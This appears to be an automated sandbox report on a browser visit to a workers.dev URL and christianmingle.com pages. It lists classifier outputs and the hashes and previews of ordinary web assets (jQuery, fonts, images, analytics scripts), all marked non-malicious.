                                                                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                                                                • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                • VT rate limit hit for: https://chattts-49f1.beszyrecala.workers.dev/16059c05-eb99-4880-8bcd-d4=
                                                                                                                                                                                                                                                                                No simulations
                                                                                                                                                                                                                                                                                InputOutput
                                                                                                                                                                                                                                                                                URL: blob:https://chattts-49f1.beszyrecala.workers.dev/72b8d5d8-909a-42bb-a197-ad8f18b1e6d0 Model: jbxai
                                                                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                                                                "brand":["unknown"],
                                                                                                                                                                                                                                                                                "contains_trigger_text":false,
                                                                                                                                                                                                                                                                                "prominent_button_name":"unknown",
                                                                                                                                                                                                                                                                                "text_input_field_labels":["unknown"],
                                                                                                                                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                                                                                                                                "has_visible_captcha":false,
                                                                                                                                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                                                                                                                                URL: blob:https://chattts-49f1.beszyrecala.workers.dev/72b8d5d8-909a-42bb-a197-ad8f18b1e6d0 Model: jbxai
                                                                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                                                                "brand":["unknown"],
                                                                                                                                                                                                                                                                                "contains_trigger_text":false,
                                                                                                                                                                                                                                                                                "prominent_button_name":"unknown",
                                                                                                                                                                                                                                                                                "text_input_field_labels":["unknown"],
                                                                                                                                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                                                                                                                                "has_visible_captcha":false,
                                                                                                                                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                                                                                                                                URL: https://www.spark.net/our-portfolio/ Model: jbxai
                                                                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                                                                "brand":["unknown"],
                                                                                                                                                                                                                                                                                "contains_trigger_text":false,
                                                                                                                                                                                                                                                                                "prominent_button_name":"unknown",
                                                                                                                                                                                                                                                                                "text_input_field_labels":["unknown"],
                                                                                                                                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                                                                                                                                "has_visible_captcha":false,
                                                                                                                                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                                                                                                                                URL: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/ Model: jbxai
                                                                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                                                                "brand":["unknown"],
                                                                                                                                                                                                                                                                                "contains_trigger_text":false,
                                                                                                                                                                                                                                                                                "prominent_button_name":"unknown",
                                                                                                                                                                                                                                                                                "text_input_field_labels":["unknown"],
                                                                                                                                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                                                                                                                                "has_visible_captcha":false,
                                                                                                                                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                                                                                                                                URL: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/ Model: jbxai
                                                                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                                                                "brand":["unknown"],
                                                                                                                                                                                                                                                                                "contains_trigger_text":false,
                                                                                                                                                                                                                                                                                "prominent_button_name":"unknown",
                                                                                                                                                                                                                                                                                "text_input_field_labels":["unknown"],
                                                                                                                                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                                                                                                                                "has_visible_captcha":false,
                                                                                                                                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                                                                                                                                No context
                                                                                                                                                                                                                                                                                No context
                                                                                                                                                                                                                                                                                No context
                                                                                                                                                                                                                                                                                No context
                                                                                                                                                                                                                                                                                No context
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (52360)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):349633
                                                                                                                                                                                                                                                                                Entropy (8bit):5.418341643700019
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:8JV0gSqdzJ3IZoCmn2y4nN4f9YPp8BwLzjPVhj1WOMUOxef54UjBuvZOWUX1YkEw:8JV06Qy4nN69YR8uLzzn1WOMU0ezdbP
                                                                                                                                                                                                                                                                                MD5:070C116054140A30A188BC802E8BDBF1
                                                                                                                                                                                                                                                                                SHA1:D4E57BB85D8CA74E4FAA0706FBE295C70B77BB64
                                                                                                                                                                                                                                                                                SHA-256:F00B02B25D3BE98C97BAC513DFA32828C1816692AB10A25A4BA31B3CC166251E
                                                                                                                                                                                                                                                                                SHA-512:2600DEBDBB3B3530ED8F4B8A96D6B581FC71CF0DB6DF26D729011D944BD2130A338162B19356F7B01FC8BEDD0C840A095233901619286360E28CC82519448497
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://analytics.tiktok.com/i18n/pixel/static/main.MWZkMThhNTg2MQ.js
                                                                                                                                                                                                                                                                                Preview:!function(){"use strict";function t(){t=function(){return e};var e={},r=Object.prototype,n=r.hasOwnProperty,o="function"==typeof Symbol?Symbol:{},i=o.iterator||"@@iterator",a=o.asyncIterator||"@@asyncIterator",c=o.toStringTag||"@@toStringTag";function u(t,e,r){return Object.defineProperty(t,e,{value:r,enumerable:!0,configurable:!0,writable:!0}),t[e]}try{u({},"")}catch(t){u=function(t,e,r){return t[e]=r}}function l(t,e,r,n){var o=e&&e.prototype instanceof p?e:p,i=Object.create(o.prototype),a=new I(n||[]);return i._invoke=function(t,e,r){var n="suspendedStart";return function(o,i){if("executing"===n)throw new Error("Generator is already running");if("completed"===n){if("throw"===o)throw i;return T()}for(r.method=o,r.arg=i;;){var a=r.delegate;if(a){var c=g(a,r);if(c){if(c===s)continue;return c}}if("next"===r.method)r.sent=r._sent=r.arg;else if("throw"===r.method){if("suspendedStart"===n)throw n="completed",r.arg;r.dispatchException(r.arg)}else"return"===r.method&&r.abrupt("return",r.arg);
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 880x771, components 3
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):72247
                                                                                                                                                                                                                                                                                Entropy (8bit):7.672516047924776
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:HryyqMtMANx0EyFSSlxwgUlxRYAOdyy6PPn9:o8VyFH2X61iPPn9
                                                                                                                                                                                                                                                                                MD5:C549B6704DEE9B81E082D3C448F87284
                                                                                                                                                                                                                                                                                SHA1:8A9FCA95F8CA271168A0C57F19C243823579B4F2
                                                                                                                                                                                                                                                                                SHA-256:79E108FFAD7FDDC88C83A5C1020070CF1BAC0F85BDEBE8F8922D01CF60059194
                                                                                                                                                                                                                                                                                SHA-512:0D7886C78F686E401F3165A3495A3ADBCB835CAFF7C28459C06956D78839168795E449C20B641629F35A80BF6579068CF5D0F5850FF6CE1ECAC10815A5E6813B
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:......JFIF.............C....................................................................C.........................................................................p.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....9<.......?......t...='.W'..s..N..Y>..5.=.}o...y..8....;.Z..'..f.w^..?.}.@....3^y..q.rz..?..^.^y..W...ZP.......r9=Gs.M.^..?..}....3FO...%...='.W'..s..N..Y>..5.=.}o...y..8....;.Z..'..f.w^..?.}.@....3^y..q.rz..?..^.^y..W...ZP.......r9=Gs.M.^..?..}....3FO...%...='.W'..s..N..Y>..5.=.}o...y..8....;.Z..'..f.w^..?.}.@....3^y..q.rz..?..^.^y..W...ZP.......r9=Gs.M.^..
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):87553
                                                                                                                                                                                                                                                                                Entropy (8bit):5.262620498676155
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:0RUX9uDgwxcy2KVBNwchN6SLaHEk2BSrBESp+a/IEk4aAocVi8SMBQ47GKO:sHNwcv9VBQpLl88SMBQ47GKO
                                                                                                                                                                                                                                                                                MD5:826EB77E86B02AB7724FE3D0141FF87C
                                                                                                                                                                                                                                                                                SHA1:79CD3587D565AFE290076A8D36C31C305A573D18
                                                                                                                                                                                                                                                                                SHA-256:CB6F2D32C49D1C2B25E9FFC9AAAFA3F83075346C01BCD4AE6EB187392A4292CF
                                                                                                                                                                                                                                                                                SHA-512:FC79FDB76763025DC39FAC045A215FF155EF2F492A0E9640079D6F089FA6218AF2B3AB7C6EAF636827DEE9294E6939A95AB24554E870C976679C25567AD6374C
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
                                                                                                                                                                                                                                                                                Preview:/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):89232
                                                                                                                                                                                                                                                                                Entropy (8bit):5.15322181389628
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:B3/BOpKMx4au+sKBCZToNm+NHwddcWLT8mJwsx4Lp6QZ:B3/0pKG4a8ICZToNm+NHwddcWLT8mJwp
                                                                                                                                                                                                                                                                                MD5:E5D134825478C5B3BF7A0347295106F3
                                                                                                                                                                                                                                                                                SHA1:AFE7E5E23CDBFF79E43C963B304EA4F6EADA096D
                                                                                                                                                                                                                                                                                SHA-256:32E457F3BFC7F102740B82FB11395502CB2AB830960C969CB8E7F13118E12624
                                                                                                                                                                                                                                                                                SHA-512:ECFB79561810296E14384B2530A3D4BBCFEB38A7CA96C35723FDE20676D2C3068CEF7392E6B24D3C14757A0A496B4887F983B0369E6C12EAE36A39AC335DC449
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:(()=>{var u={544791:(_,i,a)=>{var s={"./en.json":839132,"src/main/webapp/universal/node_modules/@sqs/i18n-cldr/packs/en.json":839132};function e(n){var r=o(n);return a(r)}function o(n){if(!a.o(s,n)){var r=new Error("Cannot find module '"+n+"'");throw r.code="MODULE_NOT_FOUND",r}return s[n]}e.keys=function(){return Object.keys(s)},e.resolve=o,_.exports=e,e.id=544791},839132:_=>{"use strict";_.exports=JSON.parse(`{"version":"1.8.3","cldr":"44.0.1","checksum":"9fa7a50e","language":"en","defaultTag":"en-Latn-US","scripts":{"Latn":{"strings":"E_Afar_Abkhazian_Achinese_Acoli_Adangme_Adyghe_Avestan_Tunisian Arabic_Afrikaans_Afrihili_Aghem_Ainu_Akan_Akkadian_Alabama_Aleut_Gheg Albanian_Southern Altai_Amharic_Aragonese_Old English_Angika_Arabic_Aramaic_Mapuche_Araona_Arapaho_Algerian Arabic_Najdi Arabic_Arawak_Moroccan Arabic_Egyptian Arabic_Assamese_Asu_American Sign Language_Asturian_Avaric_Kotava_Awadhi_Aymara_Azerbaijani_Bashkir_Baluchi_Balinese_Bavarian_Basaa_Bamun_Batak Toba_Ghomala_Belar
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):6717
                                                                                                                                                                                                                                                                                Entropy (8bit):5.480098257279493
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:cblsl8sl9xVBsGmqBPGP7BmYVWzhzYE8R:cb6NLPM5SCb
                                                                                                                                                                                                                                                                                MD5:5A357429B56B151A7101E41E0F25C9EA
                                                                                                                                                                                                                                                                                SHA1:67AE5E3727810DE53382AF29F2EBD1611AC63675
                                                                                                                                                                                                                                                                                SHA-256:CFA3CC654123E0BB9F8B5F200259748EEDA0AA6AE7C6A69185FC764FB47D346A
                                                                                                                                                                                                                                                                                SHA-512:FF6D070F2A35E703ED6FB097AB4C632C699868C7C23770FD81EB4D0BC9764083ED386D1756127132FF9E3150E0C70124EAE6C9EE2570C03CEDFD86B208303C9B
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://fonts.googleapis.com/css?family=Asap%3A300%2C400%2C200%2C300italic%7CLibre+Franklin%3A600&subset=latin&ver=6.5.3
                                                                                                                                                                                                                                                                                Preview:/* vietnamese */.@font-face {. font-family: 'Asap';. font-style: italic;. font-weight: 300;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/asap/v30/KFOMCniXp96ayz4E7kSn66aGLdTylUAMQXC89YmC2DPNWuaabVmbiArmlw.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;.}./* latin-ext */.@font-face {. font-family: 'Asap';. font-style: italic;. font-weight: 300;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/asap/v30/KFOMCniXp96ayz4E7kSn66aGLdTylUAMQXC89YmC2DPNWuaabVmaiArmlw.woff2) format('woff2');. unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Asap';. font-style: italic;. font-weight: 300;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/asap/v30/KFOMCniXp96ayz4E7kSn66
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (5729), with CRLF line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):41902
                                                                                                                                                                                                                                                                                Entropy (8bit):5.182260931204472
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:768:jGoRS8AUN05ytGAmk5DDZxJWOndtpLZccnzvUjVMJrCwb6Iv5iOi+yXlG:DS8AV5ykAmk5fZDxdt94jSJrCO61X0
                                                                                                                                                                                                                                                                                MD5:77D8A46EC11924186FFF51BA1EDBB56B
                                                                                                                                                                                                                                                                                SHA1:925D2AAAD6FC13029770E8338671E26F072E550B
                                                                                                                                                                                                                                                                                SHA-256:DEC4FCF4184D39D156C9B74097FC8632C1BF08D2709D3778623F5CD1861B0A40
                                                                                                                                                                                                                                                                                SHA-512:26D37261F4A303F5CDD9244411DBEFF0D5D62C76DBA0D6036A9702FCDC0B7498C86AD0E45FD01B0D7FA9E600175DDC3F512159A676CB307A8C8D72B81797E0B4
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:/* UItoTop jQuery Plugin | Matt Varone | http://www.mattvarone.com/web-design/uitotop-jquery-plugin */..!function(n){n.fn.UItoTop=function(o){var e={text:"To Top",min:200,inDelay:600,outDelay:400,containerID:"toTop",containerHoverID:"toTopHover",scrollSpeed:1200,easingType:"linear"},t=n.extend(e,o),i="#"+t.containerID,a="#"+t.containerHoverID;n("body").append('<a href="#" id="'+t.containerID+'"><span>'+t.text+"</span></a>"),n(i).hide().on("click.UItoTop",function(){return n("html, body").animate({scrollTop:0},t.scrollSpeed,t.easingType),n("#"+t.containerHoverID,this).stop().animate({opacity:0},t.inDelay,t.easingType),!1}).hover(function(){n(a,this).stop().animate({opacity:1},600,"linear")},function(){n(a,this).stop().animate({opacity:0},700,"linear")}),n(window).scroll(function(){var o=n(window).scrollTop();"undefined"==typeof document.body.style.maxHeight&&n(i).css({position:"absolute",top:o+n(window).height()-50}),o>t.min?n(i).fadeIn(t.inDelay):n(i).fadeOut(t.Outdelay)})}}(jQuery);..
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):135645
                                                                                                                                                                                                                                                                                Entropy (8bit):4.8452449247567255
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:S63YbYGlDezeyoo6t7z5atDr5uLEyKAuoe6GSD9elEciQM4fHGlwdZJKCX:SbDIEcLGla
                                                                                                                                                                                                                                                                                MD5:1251F40DD89A7FAE72D282B901173E8A
                                                                                                                                                                                                                                                                                SHA1:455710D6816959932AA159F257576957318546FC
                                                                                                                                                                                                                                                                                SHA-256:C2CBFBDA32BF797D8741AB3D7654F6505A686B8DC23BF4E231C442278F6A1A49
                                                                                                                                                                                                                                                                                SHA-512:99C5A4FB074E5248B5A86B7D7953E3DC280C59E5CD40EAA780C76A4342673E3A6114933388975C2F9E99826612CA24F5B03CE346310801C38BAFE2D4B1D8ABB8
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/plugins/power-builder/framework/assets/css/style.css?ver=1.3.1
                                                                                                                                                                                                                                                                                Preview:@-webkit-keyframes fadeBottom {. 0% {. opacity: 0;. -webkit-transform: translateY(10%); }. 100% {. opacity: 1;. -webkit-transform: translateY(0); } }..@-moz-keyframes fadeBottom {. 0% {. opacity: 0;. -moz-transform: translateY(10%); }. 100% {. opacity: 1;. -moz-transform: translateY(0); } }..@-o-keyframes fadeBottom {. 0% {. opacity: 0;. -o-transform: translateY(10%); }. 100% {. opacity: 1;. -o-transform: translateY(0); } }..@keyframes fadeBottom {. 0% {. opacity: 0;. transform: translateY(10%); }. 100% {. opacity: 1;. transform: translateY(0); } }..@-webkit-keyframes fadeLeft {. 0% {. opacity: 0;. -webkit-transform: translateX(-10%); }. 100% {. opacity: 1;. -webkit-transform: translateX(0); } }..@-moz-keyframes fadeLeft {. 0% {. opacity: 0;. -moz-transform: translateX(-10%); }. 100% {. opacity: 1;. -moz-transform: translateX(0); } }..@-o-keyframes fadeLeft {. 0% {. opacity: 0;. -o-transform: tra
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1464)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):1499
                                                                                                                                                                                                                                                                                Entropy (8bit):4.983141781132298
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:Q77GSHLWBBB7c0pP30RddMUq2TXWtMr39tNsSlCtMyrjXsFXrTBF0Z005O6xcHT:Q7CSHLWrxccP30RA2Tmte9/TlCtdcFbp
                                                                                                                                                                                                                                                                                MD5:8C0498E2F1F7A684A8D2A3FEB934B64B
                                                                                                                                                                                                                                                                                SHA1:76099689CCAEE466D4608DA621C403B368DCAE03
                                                                                                                                                                                                                                                                                SHA-256:ED5B5DF9CEACFE76857AC51964972B0B417A215B2F50E837FD6B64BAD7339C40
                                                                                                                                                                                                                                                                                SHA-512:5689B6B18071D6020A8A2733BB9E17C07960D9E65F4012CE93F21347FA24A24175509BCA6920FE1B03D66FBC054D718671C23071AF115B64000C01DFBEA2E8DD
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:/*! This file is auto-generated */.!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery"],e):"object"==typeof module&&module.exports?module.exports=e(require("jquery")):jQuery&&!jQuery.fn.hoverIntent&&e(jQuery)}(function(f){"use strict";function u(e){return"function"==typeof e}var i,r,v={interval:100,sensitivity:6,timeout:0},s=0,a=function(e){i=e.pageX,r=e.pageY},p=function(e,t,n,o){if(Math.sqrt((n.pX-i)*(n.pX-i)+(n.pY-r)*(n.pY-r))<o.sensitivity)return t.off(n.event,a),delete n.timeoutId,n.isActive=!0,e.pageX=i,e.pageY=r,delete n.pX,delete n.pY,o.over.apply(t[0],[e]);n.pX=i,n.pY=r,n.timeoutId=setTimeout(function(){p(e,t,n,o)},o.interval)};f.fn.hoverIntent=function(e,t,n){function o(e){var u=f.extend({},e),r=f(this),v=((t=r.data("hoverIntent"))||r.data("hoverIntent",t={}),t[i]),t=(v||(t[i]=v={id:i}),v.timeoutId&&(v.timeoutId=clearTimeout(v.timeoutId)),v.event="mousemove.hoverIntent.hoverIntent"+i);"mouseenter"===e.type?v.isActive||(v.pX=u.pageX,v.pY=u.pageY,r.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):375
                                                                                                                                                                                                                                                                                Entropy (8bit):4.315692061028271
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:2LGV1q/ikcjiEzZTrFJYMpgaD1QwaB2aMWbifF0qeCE0lFJT8Q+wieHgw:22sKriEzZTrFJPfQD2HWbifyslFJTD+W
                                                                                                                                                                                                                                                                                MD5:F4448BA400627616294217B409637EAC
                                                                                                                                                                                                                                                                                SHA1:4AC730C002261CECF752F1B4FADF2B44D3BC9865
                                                                                                                                                                                                                                                                                SHA-256:D2255C8003AFFBA56738641D18FA55DB124004942FB2D6EAE53EF379AB48E263
                                                                                                                                                                                                                                                                                SHA-512:1825855BA43AFF71B6E9FF176AB47516FEA14392E1DEE77C674838EE8CBE3130DF7C3BDB3B101F99EEE4FC982E37736362756E0AECA53243F570AF23CCFA9BF5
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:(function($){. jQuery.fn.closest_descendent = function( selector ) {. var $found,. $current_children = this.children();.. while ( $current_children.length ) {. $found = $current_children.filter( selector );. if ( $found.length ) {. break;. }. $current_children = $current_children.children();. }.. return $found;. };.}(jQuery));.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:PNG image data, 32 x 32, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):1158
                                                                                                                                                                                                                                                                                Entropy (8bit):6.777455085845385
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:h2rSKGl2k7oll4QGWeOd4IFhGNXNPUPEzKLFygQPWEBOOWo:h2rSK75ll4zWeOd4WGPUPEzKLFfo
                                                                                                                                                                                                                                                                                MD5:246B58DC2B3992E2E2D25F3AFFF7697B
                                                                                                                                                                                                                                                                                SHA1:E59FC04AA0D6C4A56E3CB2CA37C6BCD8C43B0E93
                                                                                                                                                                                                                                                                                SHA-256:A67EAC38498262D03500CF329CBF05380DF3C03FB1BF1851F977F2D963D3AE4B
                                                                                                                                                                                                                                                                                SHA-512:309332657CBE062B7355F80A4AA6BA8852E6C6B1088FE02A9CB665B38EAA614D067BEBAE8D0BAF27D62DDD6207B51BED53A70B4CCC721EF5CC5EF544FF67D438
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:.PNG........IHDR... ... .....D.......PLTE..y..v..q..n..k..g..c..^..[..W..S..T..U..T..S..O..Q.._..}..............o..X..P..K..K..N..m....................................l..P..K..L..L..G..G..Z...................w..w..}................w..N..G..J..x..\..D..E..m..........j..Q..F..D..D..D..D..F..O..e........r.......j..@..R......O..A..@..A..N..........h..B..=..A..}......i..H..>..=..=..>..H..i............_..>..8..:..e..............a..S..M..L..O..X..h.............I..9..@.........A..8..4..4..B..z.....................................q..C..5..A.........@..0..1..;..]...................t..M..5..1..0..Z.......9..-..-..0..5..;..:..2.....-..1..a..;..-..)..)..)..%..!.........................^.b....IDAT8.c` .....&.....``!..X...6.....`. ..8..........B.... ($,"*&.!)%...ddddd......UT..54..ut.ddd..ddddd......ML..-,..ml......]\..=<.........}|......C...B..#"..cb.............SR....@FfVvNn^bbbb"C~~AaQqIiYy>.TTVU....746....3477....wtvu....O.8i...9k.......?..
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:PNG image data, 130 x 57, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):4645
                                                                                                                                                                                                                                                                                Entropy (8bit):7.821389516621841
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:Bo7FblTpgN+TJtl9X6mlEevEnciCm8KnqBFI7dwAr:m7FxTdXxlBEiWnaFyD
                                                                                                                                                                                                                                                                                MD5:D1712C297E4461D70C436F33FEAB76DE
                                                                                                                                                                                                                                                                                SHA1:17B2EA8BD916DDDAC18BBFDD85287EA50AC9D5D4
                                                                                                                                                                                                                                                                                SHA-256:4004232BFDC1E7E24692C470C5650B35811C121B2F7CCB73D7A80ADF232412E3
                                                                                                                                                                                                                                                                                SHA-512:B2783078C20D77D7FE19BCAA8AED98DDD1850DBF54B2BBC37E62A031D65A54D65B15A360CD19D408BBDAE1BEC577904A04942B36BC2415366ADFE4248A6A3209
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/uploads/2018/03/ChristianMingle_130x57.png
                                                                                                                                                                                                                                                                                Preview:.PNG........IHDR.......9........K....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:66c1905a-41de-4bae-bb79-90afc20b5f27" xmpMM:DocumentID="xmp.did:4BE0DF441D5511E8ADD6910BEE192367" xmpMM:InstanceID="xmp.iid:4BE0DF431D5511E8ADD6910BEE192367" xmp:CreatorTool="Adobe Photoshop CC 2017 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:23c39c98-8bd4-49f4-b2f2-a8d9076bb49d" stRef:documentID="adobe:docid:photoshop:31cda545-e9cc-117a-971f-b127c5fbc14a"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.u.Y...5IDATx..]....
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (19332)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):21139
                                                                                                                                                                                                                                                                                Entropy (8bit):5.566201267708957
